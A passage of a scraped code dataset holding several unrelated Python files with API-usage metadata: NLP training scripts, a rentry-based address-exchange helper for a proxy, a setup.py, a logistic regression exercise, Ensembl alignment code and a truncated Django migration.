"layer.contracts.logged_data.LoggedDataType.BOOLEAN", "line_number": 159, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 159, "usage_type": "name"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.NUMBER", "line_number": 166, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 166, "usage_type": "name"}, {"api_name": "layer.contracts.projects.Project", "line_number": 171, "usage_type": "name"}, {"api_name": "test.e2e.assertion_utils.E2ETestAsserter", "line_number": 171, "usage_type": "name"}, {"api_name": "layer.clients.layer.LayerClient", "line_number": 171, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 182, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 186, "usage_type": "call"}, {"api_name": "layer.decorators.dataset", "line_number": 179, "usage_type": "call"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.TEXT", "line_number": 203, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 203, "usage_type": "name"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.TEXT", "line_number": 210, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 210, "usage_type": "name"}, {"api_name": "layer.contracts.projects.Project", "line_number": 214, "usage_type": "name"}, {"api_name": "layer.clients.layer.LayerClient", "line_number": 214, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 222, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 223, "usage_type": "call"}, {"api_name": "layer.decorators.dataset", "line_number": 219, "usage_type": "call"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.TABLE", "line_number": 235, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 235, "usage_type": "name"}, {"api_name": "layer.contracts.projects.Project", "line_number": 238, "usage_type": "name"}, {"api_name": "layer.clients.layer.LayerClient", "line_number": 238, "usage_type": "name"}, {"api_name": "layer.log", "line_number": 250, "usage_type": "call"}, {"api_name": "layer.Markdown", "line_number": 250, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 251, "usage_type": "call"}, {"api_name": "layer.decorators.dataset", "line_number": 248, "usage_type": "call"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.MARKDOWN", "line_number": 262, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 262, "usage_type": "name"}, {"api_name": "layer.contracts.projects.Project", "line_number": 266, "usage_type": "name"}, {"api_name": "layer.clients.layer.LayerClient", "line_number": 266, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 283, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 283, "usage_type": "name"}, {"api_name": "os.getcwd", "line_number": 283, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 284, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 286, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 286, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 287, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 289, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 289, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 290, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 294, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 295, "usage_type": "call"}, {"api_name": "layer.contracts.logged_data.Video", "line_number": 295, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 297, "usage_type": "call"}, {"api_name": "layer.decorators.dataset", "line_number": 276, "usage_type": "call"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.IMAGE", "line_number": 308, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 308, "usage_type": "name"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.IMAGE", "line_number": 315, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 315, "usage_type": "name"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.VIDEO", "line_number": 322, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 322, "usage_type": "name"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.VIDEO", "line_number": 329, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 329, "usage_type": "name"}, {"api_name": "sklearn.datasets.load_iris", "line_number": 339, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 339, "usage_type": "name"}, {"api_name": "sklearn.svm.SVC", "line_number": 340, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 343, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 343, "usage_type": "name"}, {"api_name": "os.getcwd", "line_number": 343, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 345, "usage_type": "call"}, {"api_name": "layer.decorators.pip_requirements", "line_number": 331, "usage_type": "call"}, {"api_name": "layer.decorators.model", "line_number": 332, "usage_type": "call"}, {"api_name": "layer.get_model", "line_number": 352, "usage_type": "call"}, {"api_name": "uuid.UUID", "line_number": 354, "usage_type": "call"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.IMAGE", "line_number": 356, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 356, "usage_type": "name"}, {"api_name": "layer.contracts.projects.Project", "line_number": 372, "usage_type": "name"}, {"api_name": "layer.clients.layer.LayerClient", "line_number": 372, "usage_type": "name"}, {"api_name": "layer.log", "line_number": 383, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 384, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 384, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 386, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 387, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 387, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 390, "usage_type": "call"}, {"api_name": "layer.decorators.dataset", "line_number": 378, "usage_type": "call"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.FILE", "line_number": 401, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 401, "usage_type": "name"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.DIRECTORY", "line_number": 408, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 408, "usage_type": "name"}, {"api_name": "layer.contracts.projects.Project", "line_number": 411, "usage_type": "name"}, {"api_name": "layer.clients.layer.LayerClient", "line_number": 411, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 423, "usage_type": "call"}, {"api_name": "seaborn.histplot", "line_number": 424, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 425, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 427, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 427, "usage_type": "name"}, {"api_name": "layer.log", "line_number": 430, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 431, "usage_type": "call"}, {"api_name": "layer.decorators.dataset", "line_number": 418, "usage_type": "call"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.IMAGE", "line_number": 444, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 444, "usage_type": "name"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.IMAGE", "line_number": 452, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 452, "usage_type": "name"}, {"api_name": "layer.contracts.projects.Project", "line_number": 455, "usage_type": "name"}, {"api_name": "layer.clients.layer.LayerClient", "line_number": 455, "usage_type": "name"}, {"api_name": "layer.log", "line_number": 465, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 468, "usage_type": "call"}, {"api_name": "layer.decorators.dataset", "line_number": 462, "usage_type": "call"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.TEXT", "line_number": 479, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 479, "usage_type": "name"}]} +{"seq_id": "41718527699", "text": "# -*- coding: utf-8 -*-\nimport argparse\nimport pickle\n\nfrom nlp_learning.torch.text_classification.base_model import Treator\nfrom nlp_learning.torch.text_classification.textCNN import TextCNN\nfrom nlp_learning.torch.text_classification.textRNN import TextRNN, TextRCNN, TextRNNAttention, TextRNNAttentionWithSentence\n\nfrom nlp_learning.torch.translation.base_model import Treator as TransTreator\nfrom nlp_learning.torch.translation.seq2seq import Seq2Seq\n\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--input_size', action='store', default=None, type=str, help='input size of one example')\nparser.add_argument('--label_size', action='store', default=None, type=int, help='label size of one example')\nparser.add_argument('--num_class', action='store', default=3, type=int, help='number of labels')\nparser.add_argument('--train_file', action='store', required=True, type=str, help='path of train data')\nparser.add_argument('--valid_file', action='store', default=\"\", type=str, help='path of validate data')\nparser.add_argument('--ckpt_folder', action='store', default=\"checkpoints\", type=str, help='path of checkpoint folder')\nparser.add_argument('--train_cp', action='store', default=None, type=str, help='checkpoint to load for training, None by default')\nparser.add_argument('--epochs', action='store', default=5, type=int, help='epochs to circulate train data, 5 by default')\nparser.add_argument('--hidden_size', action='store', default=100, type=int, help='LSTM hidden size, 100 by default')\nparser.add_argument('--embed_size', action='store', default=100, type=int, help='embedding size, 100 by default')\nparser.add_argument('--attn_size', action='store', default=100, type=int, help='attention size, 100 by default')\nparser.add_argument('--filter_sizes', action='store', default=\"1,2,3\", type=str, help='sizes of filters, \"1,2,3\" by default')\nparser.add_argument('--num_filter', action='store', default=128, type=int, help='number of filters for each size, 128 by default')\nparser.add_argument('--num_sampled', action='store', default=100, type=int, help='sampled num for softmax, 100 by default')\nparser.add_argument('--learning_rate', action='store', default=0.001, type=float, help='learning rate, 0.001 by default')\nparser.add_argument('--decay_step', action='store', default=1000, type=int, help='number of steps to make once decay rate, 1000 by default')\nparser.add_argument('--decay_rate', action='store', default=0.8, type=float, help='decay rate for learning rate, 0.8 by default')\nparser.add_argument('--batch_size', action='store', default=64, type=int, help='batch size, 64 by default')\nparser.add_argument('--l2_lambda', action='store', default=0.0001, type=float, help='learning rate, 0.0001 by default')\nparser.add_argument('--pos_weight', action='store', default=1.0, type=float, help='weight of positive sample in sigmoid cross entropy, 1.0 by default')\nparser.add_argument('--clip_gradient', action='store', default=5.0, type=float, help='clip gradients, 5.0 by default')\nparser.add_argument('--multi_label', action='store', default=False, help='if one sample has multilabels, False by default')\nparser.add_argument('--use_cuda', action='store', default=False, help='if using cuda, False by default')\n\nargs = parser.parse_args()\n\n\ndef run():\n input_size = args.input_size\n if input_size:\n input_size = [int(s) for s in input_size.strip().split(\",\")]\n if len(input_size) == 1:\n input_size = input_size[0]\n label_size = args.label_size\n num_class = args.num_class\n train_file = args.train_file\n valid_file = args.valid_file\n save_path = args.ckpt_folder\n train_cp = args.train_cp\n epochs = args.epochs\n hidden_size = args.hidden_size\n embed_size = args.embed_size\n attn_size = args.attn_size\n filter_sizes = [int(s) for s in args.filter_sizes.strip().split(\",\")]\n num_filter = args.num_filter\n num_sampled = args.num_sampled\n learning_rate = args.learning_rate\n decay_step = args.decay_step\n decay_rate = args.decay_rate\n batch_size = args.batch_size\n l2_ld = args.l2_lambda\n pos_weight = args.pos_weight\n clip_gradient = args.clip_gradient\n multi_label = args.multi_label\n use_cuda = args.use_cuda\n\n # _, _, voca_size = pickle.load(open(train_file, \"rb\"))\n #\n # model = TextCNN(voca_size, input_size, num_class, filter_sizes, num_filter, embed_size, use_cuda)\n # model = TextRNN(voca_size, num_class, hidden_size, embed_size, use_cuda)\n # model = TextRNNAttention(voca_size, num_class, hidden_size, embed_size, attn_size, use_cuda)\n # model = TextRNNAttentionWithSentence(voca_size, num_class, hidden_size, embed_size, attn_size, use_cuda)\n # model = TextRCNN(voca_size, input_size, num_class, hidden_size, embed_size, num_filter, use_cuda)\n\n # clf = Treator(model, multi_label, use_cuda)\n #\n # clf.train(train_file, save_path, valid_file, train_cp, batch_size, learning_rate, epochs, l2_ld, input_size)\n\n _, _, dict_size = pickle.load(open(train_file, \"rb\"))\n\n model = Seq2Seq(dict_size[0], dict_size[1], label_size, embed_size, hidden_size, attn_size, dropout_p=0.5, use_cuda=False)\n\n clf = TransTreator(model, use_cuda)\n\n clf.train(train_file, save_path, valid_file, train_cp, batch_size, learning_rate, epochs, input_size, label_size)\n\n\nif __name__ == \"__main__\":\n run()\n", "repo_name": "RogerLRH/nlp_learning", "sub_path": "torch_train.py", "file_name": "torch_train.py", "file_ext": "py", "file_size_in_byte": 5352, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 13, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 83, "usage_type": "call"}, {"api_name": "nlp_learning.torch.translation.seq2seq.Seq2Seq", "line_number": 85, "usage_type": "call"}, {"api_name": "nlp_learning.torch.translation.base_model.Treator", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "23086533129", "text": "from bs4 import BeautifulSoup\nimport requests\n\nimport time\nimport socket\n\n\nRENTRY_URL_PREFIX = 'https://rentry.co/'\n# RENTRY_URL_PREFIX = 'https://rentry.org/' # alternative .org domain\nIPV4_SERVICE_URL = 'https://ipinfo.io/ip'\n\n\nclass Rentry:\n def __init__(self, rentry_id, rentry_code):\n self.retry_url = RENTRY_URL_PREFIX\n self.rentry_id = rentry_id\n self.rentry_code = rentry_code\n self.retry_url_id = self.retry_url + rentry_id\n\n self.session = requests.Session()\n self.session.headers['Referer'] = self.retry_url_id\n \n def __enter__(self):\n return self\n\n def __exit__(self, *args):\n self.session.close()\n return False\n\n def _get_token(self):\n response = self.session.get(self.retry_url)\n response.raise_for_status()\n\n soup = BeautifulSoup(response.text, 'html.parser')\n return soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value']\n\n def get_raw(self):\n response = self.session.get(self.retry_url_id + '/raw')\n response.raise_for_status()\n return response.text\n\n def edit_text(self, text):\n ''' maximum `text` length of 200,000 characters '''\n data = {\n 'csrfmiddlewaretoken': self._get_token(),\n 'text': text,\n 'edit_code': self.rentry_code,\n }\n\n response = self.session.post(self.retry_url_id + '/edit', data=data, allow_redirects=False)\n assert response.status_code == 302 and response.headers['Location'] == '/' + self.rentry_id, 'wrong edit_code?'\n\n\nclass PortExchangeHelper(Rentry):\n @staticmethod\n def _extract_addrs(text):\n addrs = []\n for addr in text.splitlines():\n ip, port = addr.split(':')\n addrs.append((ip, int(port)))\n return addrs\n\n @staticmethod\n def _addrs_to_text(addrs):\n text = ''\n for ip, port in addrs:\n text += f'{ip}:{port}\\n'\n return text\n\n def get_public_ipv4(self):\n response = self.session.get(IPV4_SERVICE_URL)\n response.raise_for_status()\n return response.text\n \n def get(self):\n text = self.get_raw()\n return self._extract_addrs(text)\n\n def put(self, addrs):\n self.edit_text(self._addrs_to_text(addrs))\n\n def wait_empty(self, t=1):\n time.sleep(t)\n while self.get():\n time.sleep(t)\n \n def wait_check(self, addr, t=1):\n while True:\n time.sleep(t)\n addrs = self.get()\n assert len(addrs) in [1, 2], f'unexcepted addrs length, {addrs}'\n if len(addrs) == 2:\n return addrs\n assert addrs[0] == addr, 'race condition detected!'\n\n def put_one_wait_two(self, addr, t=1):\n self.put([addr])\n addrs = self.wait_check(addr, t)\n assert addrs[0] == addr, f'unexpected addrs order, {addrs}'\n return addrs[1] # returns the new/dst addr\n\n\ndef get_avail_port():\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind(('127.0.0.1', 0))\n return s.getsockname()[1]\n", "repo_name": "TheYoke/punching-proxy", "sub_path": "helpers.py", "file_name": "helpers.py", "file_ext": "py", "file_size_in_byte": 3110, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "requests.Session", "line_number": 20, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 34, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 83, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 85, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 89, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 104, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 104, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 104, "usage_type": "attribute"}]} +{"seq_id": "2119172109", "text": "from setuptools import setup,find_packages,Command\nfrom hammr.utils.constants import *\nimport os\n\n\nROOT_DIR = os.path.dirname(os.path.realpath(__file__))\n\n\n# Declare your packages' dependencies here, for eg:\n# Always put an '==' dependency with uforge_python_sdk during the release\n# During dev we can keep >= in order to get nightly version of sdk for the CI \nrequires=['uforge_python_sdk>=3.8.13',\n 'httplib2==0.9',\n 'texttable==0.8.1',\n 'progressbar==2.3',\n 'argparse',\n 'paramiko==1.12',\n 'pyparsing==2.0.2',\n 'pyyaml==3.12',\n 'hurry.filesize==0.9',\n 'termcolor==1.1.0',\n 'junit-xml==1.3',\n 'xmlrunner==1.7.7',\n 'ussclicore==1.0.11']\n\ntest_requires=['mock']\n\n\nclass CleanCommand(Command):\n \"\"\"Custom clean command to tidy up the project root.\"\"\"\n user_options = []\n def initialize_options(self):\n pass\n def finalize_options(self):\n pass\n def run(self):\n os.system('rm -vrf '+ROOT_DIR+'/build '+ROOT_DIR+'/dist '+ROOT_DIR+'/*.pyc '+ROOT_DIR+'/*.egg-info')\n os.system('find '+ROOT_DIR+' -iname \"*.pyc\" -exec rm {} +')\n\nsetup (\n\n install_requires=requires,\n tests_require = test_requires,\n\n # Fill in these to make your Egg ready for upload to\n # PyPI\n name = 'hammr',\n version = VERSION,\n description='Command-line tool for building conistent and repeatable machine images for multiple cloud platforms',\n long_description='command-line tool for building/publishing/migrating consistent machine images for virtual datacenters and cloud platforms',\n packages = find_packages(),\n author = 'Joris Bremond',\n author_email = 'joris.bremond@usharesoft.com',\n license=\"Apache License 2.0\",\n classifiers=(\n 'Development Status :: 4 - Beta',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'Intended Audience :: System Administrators',\n 'Natural Language :: English',\n 'Operating System :: MacOS :: MacOS X',\n 'Operating System :: Microsoft :: Windows',\n 'Operating System :: POSIX',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n ),\n \n # ... custom build command\n cmdclass={\n 'clean': CleanCommand,\n },\n\n #long_description= 'Long description of the package',\n scripts = ['bin/hammr', 'bin/hammr.bat'],\n \n)\n", "repo_name": "usharesoft/hammr", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 2589, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 28, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.path.dirname", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 6, "usage_type": "call"}, {"api_name": "setuptools.Command", "line_number": 29, "usage_type": "name"}, {"api_name": "os.system", "line_number": 37, "usage_type": "call"}, {"api_name": "os.system", "line_number": 38, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 40, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "24702405544", "text": "# Importing libraries\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split #Used to split the dataset\n\n# Logistic Regression\nclass LogitRegression():\n def __init__(self, learning_rate, iterations):\n self.learning_rate = learning_rate\n self.iterations = iterations\n\n # Function for model training\n def fit(self, X, Y):\n # no_of_training_examples, no_of_features\n self.m, self.n = X.shape\n # w=weight b=bias\n self.W = np.zeros(self.n)\n self.b = 0\n self.X = X\n self.Y = Y\n\n # gradient descent learning\n\n for i in range(self.iterations):\n self.update_weights()\n return self\n\n # Helper function to update weights in gradient descent\n\n def update_weights(self):\n A = 1 / (1 + np.exp(- (self.X.dot(self.W) + self.b)))\n\n # calculate gradients\n tmp = (A - self.Y.T)\n tmp = np.reshape(tmp, self.m)\n dW = np.dot(self.X.T, tmp) / self.m\n db = np.sum(tmp) / self.m\n\n # updating simultaneously\n self.W = self.W - self.learning_rate * dW\n self.b = self.b - self.learning_rate * db\n\n return self\n\n # Hypothetical function h(x)\n def predict(self, X):\n Z = 1 / (1 + np.exp(- (X.dot(self.W) + self.b)))\n Y = np.where(Z > 0.5, 1, 0)\n return Y\n\n#Main function\n\n# Importing the dataset( i converted my dataset to have only the fare, age and survived beforehand)\ndf = pd.read_csv(\"TitanicData.csv\")\ndf=df.dropna()\nX = df.iloc[:, :-1].values\nY = df.iloc[:, -1:].values\n\n# Splitting dataset into train and test set, using sklearn since i couldnt figure out ho to do it otherwise\nX_train, X_test, Y_train, Y_test = train_test_split(\n X, Y, test_size=1 / 3, random_state=0)\n\n\n\n# Training the model\nmodel = LogitRegression(learning_rate=0.01, iterations=1000)\nmodel.fit(X_train, Y_train)\n\n# Prediction on test set\nY_pred = model.predict(X_test)\n\n\n# measuring the performance\nRight_classification = 0\n#Counter\ncount = 0\nfor count in range(np.size(Y_pred)):\n\n if Y_test[count] == Y_pred[count]:\n Right_classification = Right_classification + 1\n count = count + 1\n\nprint(\"Accuracy on test set by our Logistic Regression model : \", (\n Right_classification / count) * 100)\n\n\n", "repo_name": "SiddhantGupta101/ISA_TP", "sub_path": "Week 1 (Logistic Regression)/LogisticRegression.py", "file_name": "LogisticRegression.py", "file_ext": "py", "file_size_in_byte": 2313, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.zeros", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 48, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 54, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.size", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "3626080614", "text": "import os\nimport torch\nimport torch.nn as nn\nimport sys \n\nfrom transformers import (\n AutoConfig,\n AutoModelForSeq2SeqLM,\n AutoTokenizer,\n)\n\ndef copy_layers(src_enc, dest_enc):\n #copy_src_dec_module = nn.ModuleList(src_dec._modules['block'])\n #dest_dec._modules['block'].load_state_dict(copy_src_dec_module.state_dict())\n copy_src_enc_module = nn.ModuleList(src_enc._modules['block'])\n dest_enc._modules['block'].load_state_dict(copy_src_enc_module.state_dict())\n\n\ndef load_model_tokenizer(training_arg):\n tokenizer = AutoTokenizer.from_pretrained(\n training_arg.model_chkpt,\n use_fast=False, \n cache_dir=training_arg.cache_dir,\n )\n special_tokens = {\"eos_token\": tokenizer.eos_token, \"pad_token\": tokenizer.pad_token, \\\n \"sep_token\": tokenizer.eos_token, \"unk_token\": tokenizer.unk_token}\n tokenizer.add_special_tokens(special_tokens)\n\n config = AutoConfig.from_pretrained(\n training_arg.model_chkpt,\n cache_dir=training_arg.cache_dir,\n bos_token_id= tokenizer.bos_token_id,\n eos_token_id= tokenizer.eos_token_id,\n sep_token_id= tokenizer.sep_token_id,\n pad_token_id= tokenizer.pad_token_id,\n unk_token_id= tokenizer.unk_token_id,\n output_hidden_states=False\n )\n\n model = AutoModelForSeq2SeqLM.from_pretrained(\n training_arg.model_chkpt,\n config=config,\n cache_dir=training_arg.cache_dir,\n )\n mix_model = AutoModelForSeq2SeqLM.from_pretrained(\n training_arg.model_chkpt,\n config=config,\n cache_dir=training_arg.cache_dir,\n )\n \n copy_layers(model.encoder, mix_model.encoder)\n copy_layers(model.encoder, mix_model.keyencoder)\n\n \n mix_model.save_pretrained(\"proposed_model\")\n\n \n return mix_model, tokenizer", "repo_name": "kaushal0494/DivHSK", "sub_path": "model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 1836, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.nn.ModuleList", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 20, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 20, "usage_type": "name"}, {"api_name": "transformers.AutoConfig.from_pretrained", "line_number": 29, "usage_type": "call"}, {"api_name": "transformers.AutoConfig", "line_number": 29, "usage_type": "name"}, {"api_name": "transformers.AutoModelForSeq2SeqLM.from_pretrained", "line_number": 40, "usage_type": "call"}, {"api_name": "transformers.AutoModelForSeq2SeqLM", "line_number": 40, "usage_type": "name"}, {"api_name": "transformers.AutoModelForSeq2SeqLM.from_pretrained", "line_number": 45, "usage_type": "call"}, {"api_name": "transformers.AutoModelForSeq2SeqLM", "line_number": 45, "usage_type": "name"}]} +{"seq_id": "2359655414", "text": "'''\nCreated on Jun 24, 2012\n\n@author: anana\n'''\n# Python imports\nimport re\n\n# BioPython imports\nfrom Bio.Seq import Seq\nfrom Bio.Alphabet import IUPAC\n\n# data analysis imports\nfrom data_analysis.containers.ProteinContainer import ProteinContainer\nfrom data_analysis.translation.TranslationUtils import translate_ensembl_exons\n\n\n\nclass EnsemblAlignment (object):\n '''\n Place holder for ensembl exons from species \n that correspond to the alignment with the human exon.\n '''\n \n def __init__ (self, ref_protein_id, ref_exon, alignment_exon, ensembl_exons):\n \n self.ref_protein_id = ref_protein_id\n self.ref_exon = ref_exon\n self.alignment_exon = alignment_exon\n self.ensembl_exons = ensembl_exons\n self.set_protein_sequences ()\n \n def set_protein_sequences (self):\n '''\n Find the right translation frame and \n translate the alignment piece to protein.\n Find the location on the referent protein.\n '''\n\n pc = ProteinContainer.Instance()\n \n ref_protein = pc.get(self.ref_protein_id)\n ref_protein_seq = ref_protein.get_sequence_record().seq\n partial_ref_seq = Seq(self.alignment_exon.alignment_info[\"sbjct_seq\"].replace(\"-\",\"\"), IUPAC.ambiguous_dna)\n \n \n complete_protein_exon_seq = self.ref_exon.sequence [self.ref_exon.frame:].translate()\n if str(complete_protein_exon_seq).endswith(\"*\"):\n complete_protein_exon_seq = complete_protein_exon_seq[0:len(complete_protein_exon_seq)-1]\n\n exon_prot_start = str(ref_protein_seq).find(str(complete_protein_exon_seq))\n exon_prot_stop = exon_prot_start + len(complete_protein_exon_seq)\n \n for frame in (0,1,2):\n partial_protein_ref_seq = partial_ref_seq[frame:].translate()\n if str(partial_protein_ref_seq).endswith(\"*\"):\n partial_protein_ref_seq = partial_protein_ref_seq[0:len(partial_protein_ref_seq)-1]\n found = False\n \n if str(complete_protein_exon_seq).find (str(partial_protein_ref_seq)) != -1:\n for a in list(re.finditer(str(partial_protein_ref_seq), str(ref_protein_seq))): \n if a.start() >= exon_prot_start and a.end() <= exon_prot_stop:\n self.ref_protein_seq = partial_protein_ref_seq\n self.ref_protein_start = a.start()\n self.ref_protein_stop = a.end()\n found = True\n break\n if found:\n break\n \n self.spec_protein_seq = translate_ensembl_exons(self.ensembl_exons)\n \n \n def get_cDNA (self, len_so_far):\n \n rest = len_so_far % 3\n \n total_exon_len = len(self.ref_exon.sequence) \n alignment_start = self.alignment_exon.alignment_info[\"sbjct_start\"]\n padded_cdna = \"N\"* (alignment_start-1)\n len_added = 0\n \n new_frame = (3-(self.ensembl_exons[0].relative_start - self.ensembl_exons[0].frame)%3)%3\n if new_frame == 0:\n if rest != 0:\n padded_cdna += \"N\"* (3-rest)\n elif new_frame == 1:\n if rest != 2:\n padded_cdna += \"N\" *(2-rest)\n else:\n if rest != 1:\n if rest == 2:\n padded_cdna += \"N\"*2\n else:\n padded_cdna += \"N\"\n \n for ens_exon in self.ensembl_exons:\n coding_part = ens_exon.sequence[ens_exon.relative_start:ens_exon.relative_stop]\n padded_cdna += coding_part\n len_added += len(padded_cdna)\n \n padded_cdna += \"N\" * (total_exon_len-len_added)\n return padded_cdna\n \n ", "repo_name": "abulovic/SuperExonRetriver2000", "sub_path": "ExoLocator/data_analysis/translation/EnsemblAlignment.py", "file_name": "EnsemblAlignment.py", "file_ext": "py", "file_size_in_byte": 3859, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "data_analysis.containers.ProteinContainer.ProteinContainer.Instance", "line_number": 40, "usage_type": "call"}, {"api_name": "data_analysis.containers.ProteinContainer.ProteinContainer", "line_number": 40, "usage_type": "name"}, {"api_name": "Bio.Seq.Seq", "line_number": 44, "usage_type": "call"}, {"api_name": "Bio.Alphabet.IUPAC.ambiguous_dna", "line_number": 44, "usage_type": "attribute"}, {"api_name": "Bio.Alphabet.IUPAC", "line_number": 44, "usage_type": "name"}, {"api_name": "re.finditer", "line_number": 61, "usage_type": "call"}, {"api_name": "data_analysis.translation.TranslationUtils.translate_ensembl_exons", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "22177942767", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0002_post_data'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='post',\n name='startups',\n field=models.ManyToManyField(related_name='blog_posts', 